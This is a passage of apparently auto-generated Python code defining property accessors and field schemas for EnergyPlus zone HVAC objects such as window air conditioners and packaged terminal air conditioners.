ValueError: if `value` is not a valid value
Returns:
str: the value of `air_outlet_node_name` or None if not set
"""
return self["Air Outlet Node Name"]
@air_outlet_node_name.setter
def air_outlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Outlet Node Name`"""
self["Air Outlet Node Name"] = value
@property
def outdoor_air_mixer_object_type(self):
"""field `Outdoor Air Mixer Object Type`
| currently only one type OutdoorAir:Mixer object is available.
Args:
value (str): value for IDD Field `Outdoor Air Mixer Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_mixer_object_type` or None if not set
"""
return self["Outdoor Air Mixer Object Type"]
@outdoor_air_mixer_object_type.setter
def outdoor_air_mixer_object_type(self, value=None):
"""Corresponds to IDD field `Outdoor Air Mixer Object Type`"""
self["Outdoor Air Mixer Object Type"] = value
@property
def outdoor_air_mixer_name(self):
"""field `Outdoor Air Mixer Name`
Args:
value (str): value for IDD Field `Outdoor Air Mixer Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_mixer_name` or None if not set
"""
return self["Outdoor Air Mixer Name"]
@outdoor_air_mixer_name.setter
def outdoor_air_mixer_name(self, value=None):
"""Corresponds to IDD field `Outdoor Air Mixer Name`"""
self["Outdoor Air Mixer Name"] = value
@property
def supply_air_fan_object_type(self):
"""field `Supply Air Fan Object Type`
| Fan type must be according to capacity control method (see I/O)
| For ConstantFanVariableFlow a Fan:OnOff or Fan:ConstantVolume is valid.
| For CyclingFan, a Fan:OnOff is valid.
| For VariableFanVariableFlow or VariableFanConstantFlow a Fan:VariableVolume is valid.
| The fan's inlet node should be the same as the outdoor air mixer's mixed air node.
Args:
value (str): value for IDD Field `Supply Air Fan Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_object_type` or None if not set
"""
return self["Supply Air Fan Object Type"]
@supply_air_fan_object_type.setter
def supply_air_fan_object_type(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Object Type`"""
self["Supply Air Fan Object Type"] = value
@property
def supply_air_fan_name(self):
"""field `Supply Air Fan Name`
Args:
value (str): value for IDD Field `Supply Air Fan Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_name` or None if not set
"""
return self["Supply Air Fan Name"]
@supply_air_fan_name.setter
def supply_air_fan_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Name`"""
self["Supply Air Fan Name"] = value
@property
def cooling_coil_object_type(self):
"""field `Cooling Coil Object Type`
Args:
value (str): value for IDD Field `Cooling Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_coil_object_type` or None if not set
"""
return self["Cooling Coil Object Type"]
@cooling_coil_object_type.setter
def cooling_coil_object_type(self, value=None):
"""Corresponds to IDD field `Cooling Coil Object Type`"""
self["Cooling Coil Object Type"] = value
@property
def cooling_coil_name(self):
"""field `Cooling Coil Name`
Args:
value (str): value for IDD Field `Cooling Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_coil_name` or None if not set
"""
return self["Cooling Coil Name"]
@cooling_coil_name.setter
def cooling_coil_name(self, value=None):
"""Corresponds to IDD field `Cooling Coil Name`"""
self["Cooling Coil Name"] = value
@property
def maximum_cold_water_flow_rate(self):
"""field `Maximum Cold Water Flow Rate`
| Units: m3/s
| IP-Units: gal/min
Args:
value (float or "Autosize"): value for IDD Field `Maximum Cold Water Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `maximum_cold_water_flow_rate` or None if not set
"""
return self["Maximum Cold Water Flow Rate"]
@maximum_cold_water_flow_rate.setter
def maximum_cold_water_flow_rate(self, value=None):
"""Corresponds to IDD field `Maximum Cold Water Flow Rate`"""
self["Maximum Cold Water Flow Rate"] = value
@property
def minimum_cold_water_flow_rate(self):
"""field `Minimum Cold Water Flow Rate`
| Units: m3/s
| IP-Units: gal/min
Args:
value (float): value for IDD Field `Minimum Cold Water Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `minimum_cold_water_flow_rate` or None if not set
"""
return self["Minimum Cold Water Flow Rate"]
@minimum_cold_water_flow_rate.setter
def minimum_cold_water_flow_rate(self, value=None):
"""Corresponds to IDD field `Minimum Cold Water Flow Rate`"""
self["Minimum Cold Water Flow Rate"] = value
@property
def cooling_convergence_tolerance(self):
"""field `Cooling Convergence Tolerance`
| Default value: 0.001
Args:
value (float): value for IDD Field `Cooling Convergence Tolerance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_convergence_tolerance` or None if not set
"""
return self["Cooling Convergence Tolerance"]
@cooling_convergence_tolerance.setter
def cooling_convergence_tolerance(self, value=0.001):
"""Corresponds to IDD field `Cooling Convergence Tolerance`"""
self["Cooling Convergence Tolerance"] = value
@property
def heating_coil_object_type(self):
"""field `Heating Coil Object Type`
Args:
value (str): value for IDD Field `Heating Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_object_type` or None if not set
"""
return self["Heating Coil Object Type"]
@heating_coil_object_type.setter
def heating_coil_object_type(self, value=None):
"""Corresponds to IDD field `Heating Coil Object Type`"""
self["Heating Coil Object Type"] = value
@property
def heating_coil_name(self):
"""field `Heating Coil Name`
Args:
value (str): value for IDD Field `Heating Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_name` or None if not set
"""
return self["Heating Coil Name"]
@heating_coil_name.setter
def heating_coil_name(self, value=None):
"""Corresponds to IDD field `Heating Coil Name`"""
self["Heating Coil Name"] = value
@property
def maximum_hot_water_flow_rate(self):
"""field `Maximum Hot Water Flow Rate`
| Units: m3/s
| IP-Units: gal/min
Args:
value (float or "Autosize"): value for IDD Field `Maximum Hot Water Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `maximum_hot_water_flow_rate` or None if not set
"""
return self["Maximum Hot Water Flow Rate"]
@maximum_hot_water_flow_rate.setter
def maximum_hot_water_flow_rate(self, value=None):
"""Corresponds to IDD field `Maximum Hot Water Flow Rate`"""
self["Maximum Hot Water Flow Rate"] = value
@property
def minimum_hot_water_flow_rate(self):
"""field `Minimum Hot Water Flow Rate`
| Units: m3/s
| IP-Units: gal/min
Args:
value (float): value for IDD Field `Minimum Hot Water Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `minimum_hot_water_flow_rate` or None if not set
"""
return self["Minimum Hot Water Flow Rate"]
@minimum_hot_water_flow_rate.setter
def minimum_hot_water_flow_rate(self, value=None):
"""Corresponds to IDD field `Minimum Hot Water Flow Rate`"""
self["Minimum Hot Water Flow Rate"] = value
@property
def heating_convergence_tolerance(self):
"""field `Heating Convergence Tolerance`
| Default value: 0.001
Args:
value (float): value for IDD Field `Heating Convergence Tolerance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_convergence_tolerance` or None if not set
"""
return self["Heating Convergence Tolerance"]
@heating_convergence_tolerance.setter
def heating_convergence_tolerance(self, value=0.001):
"""Corresponds to IDD field `Heating Convergence Tolerance`"""
self["Heating Convergence Tolerance"] = value
@property
def availability_manager_list_name(self):
"""field `Availability Manager List Name`
| Enter the name of an AvailabilityManagerAssignmentList object.
Args:
value (str): value for IDD Field `Availability Manager List Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_manager_list_name` or None if not set
"""
return self["Availability Manager List Name"]
@availability_manager_list_name.setter
def availability_manager_list_name(self, value=None):
"""Corresponds to IDD field `Availability Manager List Name`"""
self["Availability Manager List Name"] = value
@property
def design_specification_zonehvac_sizing_object_name(self):
"""field `Design Specification ZoneHVAC Sizing Object Name`
| Enter the name of a DesignSpecificationZoneHVACSizing object.
Args:
value (str): value for IDD Field `Design Specification ZoneHVAC Sizing Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `design_specification_zonehvac_sizing_object_name` or None if not set
"""
return self["Design Specification ZoneHVAC Sizing Object Name"]
@design_specification_zonehvac_sizing_object_name.setter
def design_specification_zonehvac_sizing_object_name(self, value=None):
"""Corresponds to IDD field `Design Specification ZoneHVAC Sizing
Object Name`"""
self["Design Specification ZoneHVAC Sizing Object Name"] = value
@property
def supply_air_fan_operating_mode_schedule_name(self):
"""field `Supply Air Fan Operating Mode Schedule Name`
| Enter the name of a schedule that controls fan operation. Schedule Name values of 0 denote
| cycling fan operation (fan cycles with cooling coil). Schedule values greater
| than 0 denote constant fan operation (fan runs continually regardless of coil operation).
| The fan operating mode defaults to cycling fan operation if this field is left blank.
| This input field is currently used with MultiStageFan capacity control method
Args:
value (str): value for IDD Field `Supply Air Fan Operating Mode Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_operating_mode_schedule_name` or None if not set
"""
return self["Supply Air Fan Operating Mode Schedule Name"]
@supply_air_fan_operating_mode_schedule_name.setter
def supply_air_fan_operating_mode_schedule_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Operating Mode Schedule
Name`"""
self["Supply Air Fan Operating Mode Schedule Name"] = value
class ZoneHvacWindowAirConditioner(DataObject):
""" Corresponds to IDD object `ZoneHVAC:WindowAirConditioner`
Window air conditioner. Forced-convection cooling-only unit with supply fan, direct
expansion (DX) cooling coil, and fixed-position outdoor air mixer.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'availability schedule name',
{'name': u'Availability Schedule Name',
'pyname': u'availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'maximum supply air flow rate',
{'name': u'Maximum Supply Air Flow Rate',
'pyname': u'maximum_supply_air_flow_rate',
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'maximum outdoor air flow rate',
{'name': u'Maximum Outdoor Air Flow Rate',
'pyname': u'maximum_outdoor_air_flow_rate',
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'air inlet node name',
{'name': u'Air Inlet Node Name',
'pyname': u'air_inlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'air outlet node name',
{'name': u'Air Outlet Node Name',
'pyname': u'air_outlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'outdoor air mixer object type',
{'name': u'Outdoor Air Mixer Object Type',
'pyname': u'outdoor_air_mixer_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'OutdoorAir:Mixer'],
'autocalculatable': False,
'type': 'alpha'}),
(u'outdoor air mixer name',
{'name': u'Outdoor Air Mixer Name',
'pyname': u'outdoor_air_mixer_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'supply air fan object type',
{'name': u'Supply Air Fan Object Type',
'pyname': u'supply_air_fan_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Fan:OnOff',
u'Fan:ConstantVolume'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan name',
{'name': u'Supply Air Fan Name',
'pyname': u'supply_air_fan_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cooling coil object type',
{'name': u'Cooling Coil Object Type',
'pyname': u'cooling_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Cooling:DX:SingleSpeed',
u'CoilSystem:Cooling:DX:HeatExchangerAssisted'],
'autocalculatable': False,
'type': 'alpha'}),
(u'dx cooling coil name',
{'name': u'DX Cooling Coil Name',
'pyname': u'dx_cooling_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'supply air fan operating mode schedule name',
{'name': u'Supply Air Fan Operating Mode Schedule Name',
'pyname': u'supply_air_fan_operating_mode_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'fan placement',
{'name': u'Fan Placement',
'pyname': u'fan_placement',
'required-field': True,
'autosizable': False,
'accepted-values': [u'BlowThrough',
u'DrawThrough'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling convergence tolerance',
{'name': u'Cooling Convergence Tolerance',
'pyname': u'cooling_convergence_tolerance',
'default': 0.001,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'availability manager list name',
{'name': u'Availability Manager List Name',
'pyname': u'availability_manager_list_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'design specification zonehvac sizing object name',
{'name': u'Design Specification ZoneHVAC Sizing Object Name',
'pyname': u'design_specification_zonehvac_sizing_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 15,
'name': u'ZoneHVAC:WindowAirConditioner',
'pyname': u'ZoneHvacWindowAirConditioner',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def availability_schedule_name(self):
"""field `Availability Schedule Name`
| Availability schedule name for this system. Schedule value > 0 means the system is available.
| If this field is blank, the system is always available.
Args:
value (str): value for IDD Field `Availability Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_schedule_name` or None if not set
"""
return self["Availability Schedule Name"]
@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
"""Corresponds to IDD field `Availability Schedule Name`"""
self["Availability Schedule Name"] = value
@property
def maximum_supply_air_flow_rate(self):
"""field `Maximum Supply Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Maximum Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `maximum_supply_air_flow_rate` or None if not set
"""
return self["Maximum Supply Air Flow Rate"]
@maximum_supply_air_flow_rate.setter
def maximum_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Maximum Supply Air Flow Rate`"""
self["Maximum Supply Air Flow Rate"] = value
@property
def maximum_outdoor_air_flow_rate(self):
"""field `Maximum Outdoor Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Maximum Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `maximum_outdoor_air_flow_rate` or None if not set
"""
return self["Maximum Outdoor Air Flow Rate"]
@maximum_outdoor_air_flow_rate.setter
def maximum_outdoor_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Maximum Outdoor Air Flow Rate`"""
self["Maximum Outdoor Air Flow Rate"] = value
@property
def air_inlet_node_name(self):
"""field `Air Inlet Node Name`
Args:
value (str): value for IDD Field `Air Inlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `air_inlet_node_name` or None if not set
"""
return self["Air Inlet Node Name"]
@air_inlet_node_name.setter
def air_inlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Inlet Node Name`"""
self["Air Inlet Node Name"] = value
@property
def air_outlet_node_name(self):
"""field `Air Outlet Node Name`
Args:
value (str): value for IDD Field `Air Outlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `air_outlet_node_name` or None if not set
"""
return self["Air Outlet Node Name"]
@air_outlet_node_name.setter
def air_outlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Outlet Node Name`"""
self["Air Outlet Node Name"] = value
@property
def outdoor_air_mixer_object_type(self):
"""field `Outdoor Air Mixer Object Type`
| currently only one OutdoorAir:Mixer object type is available.
Args:
value (str): value for IDD Field `Outdoor Air Mixer Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_mixer_object_type` or None if not set
"""
return self["Outdoor Air Mixer Object Type"]
@outdoor_air_mixer_object_type.setter
def outdoor_air_mixer_object_type(self, value=None):
"""Corresponds to IDD field `Outdoor Air Mixer Object Type`"""
self["Outdoor Air Mixer Object Type"] = value
@property
def outdoor_air_mixer_name(self):
"""field `Outdoor Air Mixer Name`
Args:
value (str): value for IDD Field `Outdoor Air Mixer Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_mixer_name` or None if not set
"""
return self["Outdoor Air Mixer Name"]
@outdoor_air_mixer_name.setter
def outdoor_air_mixer_name(self, value=None):
"""Corresponds to IDD field `Outdoor Air Mixer Name`"""
self["Outdoor Air Mixer Name"] = value
@property
def supply_air_fan_object_type(self):
"""field `Supply Air Fan Object Type`
| Fan:ConstantVolume only works when continuous fan operation is used the entire
| simulation (all supply air fan operating mode schedule values are greater than 0).
| If any fan operating mode schedule values are 0 a Fan:OnOff object must be used.
Args:
value (str): value for IDD Field `Supply Air Fan Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_object_type` or None if not set
"""
return self["Supply Air Fan Object Type"]
@supply_air_fan_object_type.setter
def supply_air_fan_object_type(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Object Type`"""
self["Supply Air Fan Object Type"] = value
@property
def supply_air_fan_name(self):
"""field `Supply Air Fan Name`
| Fan type Fan:ConstantVolume is used with continuous fan
| and fan type Fan:OnOff is used with cycling Fan.
Args:
value (str): value for IDD Field `Supply Air Fan Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_name` or None if not set
"""
return self["Supply Air Fan Name"]
@supply_air_fan_name.setter
def supply_air_fan_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Name`"""
self["Supply Air Fan Name"] = value
@property
def cooling_coil_object_type(self):
"""field `Cooling Coil Object Type`
Args:
value (str): value for IDD Field `Cooling Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_coil_object_type` or None if not set
"""
return self["Cooling Coil Object Type"]
@cooling_coil_object_type.setter
def cooling_coil_object_type(self, value=None):
"""Corresponds to IDD field `Cooling Coil Object Type`"""
self["Cooling Coil Object Type"] = value
@property
def dx_cooling_coil_name(self):
"""field `DX Cooling Coil Name`
Args:
value (str): value for IDD Field `DX Cooling Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `dx_cooling_coil_name` or None if not set
"""
return self["DX Cooling Coil Name"]
@dx_cooling_coil_name.setter
def dx_cooling_coil_name(self, value=None):
"""Corresponds to IDD field `DX Cooling Coil Name`"""
self["DX Cooling Coil Name"] = value
@property
def supply_air_fan_operating_mode_schedule_name(self):
"""field `Supply Air Fan Operating Mode Schedule Name`
| Enter the name of a schedule that controls fan operation. Schedule Name values of 0 denote
| cycling fan operation (fan cycles with cooling coil). Schedule values greater
| than 0 denote constant fan operation (fan runs continually regardless of coil operation).
| The fan operating mode defaults to cycling fan operation if this field is left blank.
Args:
value (str): value for IDD Field `Supply Air Fan Operating Mode Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_operating_mode_schedule_name` or None if not set
"""
return self["Supply Air Fan Operating Mode Schedule Name"]
@supply_air_fan_operating_mode_schedule_name.setter
def supply_air_fan_operating_mode_schedule_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Operating Mode Schedule
Name`"""
self["Supply Air Fan Operating Mode Schedule Name"] = value
@property
def fan_placement(self):
"""field `Fan Placement`
Args:
value (str): value for IDD Field `Fan Placement`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `fan_placement` or None if not set
"""
return self["Fan Placement"]
@fan_placement.setter
def fan_placement(self, value=None):
"""Corresponds to IDD field `Fan Placement`"""
self["Fan Placement"] = value
@property
def cooling_convergence_tolerance(self):
"""field `Cooling Convergence Tolerance`
| Default value: 0.001
Args:
value (float): value for IDD Field `Cooling Convergence Tolerance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_convergence_tolerance` or None if not set
"""
return self["Cooling Convergence Tolerance"]
@cooling_convergence_tolerance.setter
def cooling_convergence_tolerance(self, value=0.001):
"""Corresponds to IDD field `Cooling Convergence Tolerance`"""
self["Cooling Convergence Tolerance"] = value
@property
def availability_manager_list_name(self):
"""field `Availability Manager List Name`
| Enter the name of an AvailabilityManagerAssignmentList object.
Args:
value (str): value for IDD Field `Availability Manager List Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_manager_list_name` or None if not set
"""
return self["Availability Manager List Name"]
@availability_manager_list_name.setter
def availability_manager_list_name(self, value=None):
"""Corresponds to IDD field `Availability Manager List Name`"""
self["Availability Manager List Name"] = value
@property
def design_specification_zonehvac_sizing_object_name(self):
"""field `Design Specification ZoneHVAC Sizing Object Name`
| Enter the name of a DesignSpecificationZoneHVACSizing object.
Args:
value (str): value for IDD Field `Design Specification ZoneHVAC Sizing Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `design_specification_zonehvac_sizing_object_name` or None if not set
"""
return self["Design Specification ZoneHVAC Sizing Object Name"]
@design_specification_zonehvac_sizing_object_name.setter
def design_specification_zonehvac_sizing_object_name(self, value=None):
"""Corresponds to IDD field `Design Specification ZoneHVAC Sizing
Object Name`"""
self["Design Specification ZoneHVAC Sizing Object Name"] = value
class ZoneHvacPackagedTerminalAirConditioner(DataObject):
""" Corresponds to IDD object `ZoneHVAC:PackagedTerminalAirConditioner`
Packaged terminal air conditioner (PTAC). Forced-convection heating-cooling unit
with supply fan, direct expansion (DX) cooling coil, heating coil (gas, electric, hot
water, or steam) and fixed-position outdoor air mixer.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'availability schedule name',
{'name': u'Availability Schedule Name',
'pyname': u'availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'air inlet node name',
{'name': u'Air Inlet Node Name',
'pyname': u'air_inlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'air outlet node name',
{'name': u'Air Outlet Node Name',
'pyname': u'air_outlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'outdoor air mixer object type',
{'name': u'Outdoor Air Mixer Object Type',
'pyname': u'outdoor_air_mixer_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'OutdoorAir:Mixer'],
'autocalculatable': False,
'type': 'alpha'}),
(u'outdoor air mixer name',
{'name': u'Outdoor Air Mixer Name',
'pyname': u'outdoor_air_mixer_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cooling supply air flow rate',
{'name': u'Cooling Supply Air Flow Rate',
'pyname': u'cooling_supply_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'heating supply air flow rate',
{'name': u'Heating Supply Air Flow Rate',
'pyname': u'heating_supply_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'no load supply air flow rate',
{'name': u'No Load Supply Air Flow Rate',
'pyname': u'no_load_supply_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'cooling outdoor air flow rate',
{'name': u'Cooling Outdoor Air Flow Rate',
'pyname': u'cooling_outdoor_air_flow_rate',
'required-field': True,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'heating outdoor air flow rate',
{'name': u'Heating Outdoor Air Flow Rate',
'pyname': u'heating_outdoor_air_flow_rate',
'required-field': True,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'no load outdoor air flow rate',
{'name': u'No Load Outdoor Air Flow Rate',
'pyname': u'no_load_outdoor_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'supply air fan object type',
{'name': u'Supply Air Fan Object Type',
'pyname': u'supply_air_fan_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Fan:OnOff',
u'Fan:ConstantVolume'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan name',
{'name': u'Supply Air Fan Name',
'pyname': u'supply_air_fan_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'heating coil object type',
{'name': u'Heating Coil Object Type',
'pyname': u'heating_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Gas',
u'Coil:Heating:Electric',
u'Coil:Heating:Water',
u'Coil:Heating:Steam'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heating coil name',
{'name': u'Heating Coil Name',
'pyname': u'heating_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cooling coil object type',
{'name': u'Cooling Coil Object Type',
'pyname': u'cooling_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Cooling:DX:SingleSpeed',
u'Coil:Cooling:DX:VariableSpeed',
u'CoilSystem:Cooling:DX:HeatExchangerAssisted'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling coil name',
{'name': u'Cooling Coil Name',
'pyname': u'cooling_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'fan placement',
{'name': u'Fan Placement',
'pyname': u'fan_placement',
'default': u'DrawThrough',
'required-field': False,
'autosizable': False,
'accepted-values': [u'BlowThrough',
u'DrawThrough'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan operating mode schedule name',
{'name': u'Supply Air Fan Operating Mode Schedule Name',
'pyname': u'supply_air_fan_operating_mode_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'availability manager list name',
{'name': u'Availability Manager List Name',
'pyname': u'availability_manager_list_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'design specification zonehvac sizing object name',
{'name': u'Design Specification ZoneHVAC Sizing Object Name',
'pyname': u'design_specification_zonehvac_sizing_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 18,
'name': u'ZoneHVAC:PackagedTerminalAirConditioner',
'pyname': u'ZoneHvacPackagedTerminalAirConditioner',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| Unique name for this packaged terminal air conditioner object.
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def availability_schedule_name(self):
"""field `Availability Schedule Name`
| Availability schedule name for this system. Schedule value > 0 means the system is available.
| If this field is blank, the system is always available.
| Schedule values of 0 denote the unit is off.
Args:
value (str): value for IDD Field `Availability Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_schedule_name` or None if not set
"""
return self["Availability Schedule Name"]
@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
"""Corresponds to IDD field `Availability Schedule Name`"""
self["Availability Schedule Name"] = value
@property
def air_inlet_node_name(self):
"""field `Air Inlet Node Name`
| Air inlet node for the PTAC must be a zone air exhaust Node.
Args:
value (str): value for IDD Field `Air Inlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `air_inlet_node_name` or None if not set
"""
return self["Air Inlet Node Name"]
@air_inlet_node_name.setter
def air_inlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Inlet Node Name`"""
self["Air Inlet Node Name"] = value
@property
def air_outlet_node_name(self):
"""field `Air Outlet Node Name`
| Air outlet node for the PTAC must be a zone air inlet node.
Args:
value (str): value for IDD Field `Air Outlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `air_outlet_node_name` or None if not set
"""
return self["Air Outlet Node Name"]
@air_outlet_node_name.setter
def air_outlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Outlet Node Name`"""
self["Air Outlet Node Name"] = value
@property
def outdoor_air_mixer_object_type(self):
"""field `Outdoor Air Mixer Object Type`
| currently only one OutdoorAir:Mixer object type is available.
Args:
value (str): value for IDD Field `Outdoor Air Mixer Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_mixer_object_type` or None if not set
"""
return self["Outdoor Air Mixer Object Type"]
@outdoor_air_mixer_object_type.setter
def outdoor_air_mixer_object_type(self, value=None):
"""Corresponds to IDD field `Outdoor Air Mixer Object Type`"""
self["Outdoor Air Mixer Object Type"] = value
@property
def outdoor_air_mixer_name(self):
"""field `Outdoor Air Mixer Name`
| Needs to match the name of the PTAC outdoor air mixer object.
Args:
value (str): value for IDD Field `Outdoor Air Mixer Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_mixer_name` or None if not set
"""
return self["Outdoor Air Mixer Name"]
@outdoor_air_mixer_name.setter
def outdoor_air_mixer_name(self, value=None):
"""Corresponds to IDD field `Outdoor Air Mixer Name`"""
self["Outdoor Air Mixer Name"] = value
@property
def cooling_supply_air_flow_rate(self):
"""field `Cooling Supply Air Flow Rate`
